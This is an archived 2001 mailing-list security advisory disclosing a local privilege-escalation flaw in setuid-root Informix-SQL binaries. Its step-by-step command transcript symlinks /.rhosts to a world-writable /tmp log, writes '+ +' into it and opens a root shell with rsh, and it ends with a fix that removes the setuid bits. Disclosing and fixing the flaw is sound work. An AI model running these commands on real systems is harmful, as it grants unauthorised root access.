OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: s96192ce.hannam.ac.kr
Date: Tue Sep 04 2001 - 08:18:47 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ==============================================================================

           [ Hackerslab bug_paper ] Informix-SQL application vulnerability

    ==============================================================================

    File : Informix-SQL application

    SYSTEM : Systems running Informix

    INFO :

    There is a vulneribility in informix-SQL application which allows local
    users to create any file with root privilege:

    PART 1 :
    $ id
    uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
    $ umask 0000
    $ cd ~informix/bin (Informix HOME Directory)
    $ ./onshowaudit
    INFORMIX-SQL Version 7.31.UC5
    $ ls -al onbar_d ondblog onsmsync onsrvapd
    -rwsr-sr-x 1 root informix 2234104 Nov 18 1999 onbar_d
    -rwsr-sr-x 1 root informix 2219456 Nov 18 1999 ondblog
    -rwsr-sr-x 1 root informix 2284972 Apr 10 2000 onsmsync
    -rwsr-sr-x 1 root informix 39144 Nov 18 1999 onsrvapd

    $ ./onbar_d or ./ondblog or ./onsmsync
    $ ls -al /tmp/bar*
    -rw-rw---- 1 root informix 557 Aug 29 17:26 /tmp/bar_act.log
    -rw-rw---- 1 root informix 0 Aug 29 17:26 /tmp/bar_dbug.log

    PART 2:
    $ ./onsrvapd
    $ ls -al /tmp/ons*
    -rw-rw-rw- 1 root informix 141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
    -rw-rw-rw- 1 informix informix 319 Aug 29 17:38 /tmp/onsrvapd.log

    PART 3:

    $ ./snmpdm
    $ ls -al /tmp/snmpd.log
    -rwxrwxrwx 1 root root 1085 Aug 29 17:43 /tmp/snmpd.log

    PART 4:
    loveyoudogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
    loveyoudogfoot$ ~informix/bin/onsrvapd &
    loveyoudogfoot$ ls -al /.rhosts
    -rw-rw-rw- 1 root informix 141 Aug 29 18:28 /.rhosts
    loveyoudogfoot$ echo "+ +" > /.rhosts
    loveyoudogfoot$ rsh -l root localhost csh -i
    # whoami
    root

    SOLUTION :

    remove setuid permition, contact your vendor and get a patch.
    $ su -
    # cd ~informix/bin (Informix HOME Directory)
    # chmod o-s onbar_d ondblog onsmsync onsrvapd

    ==-------------------------------------------------------------------------------==
           ********
       * ** ** *
     * ** ** *
    * ****** * Kim Yong-Jun
     * ** ** * loveyouhackerslab.org
       * ** ** * [ http://www.hackerslab.org ]
           ******** HACKERSLAB (C) since 1999
    ==-------------------------------------------------------------------------------==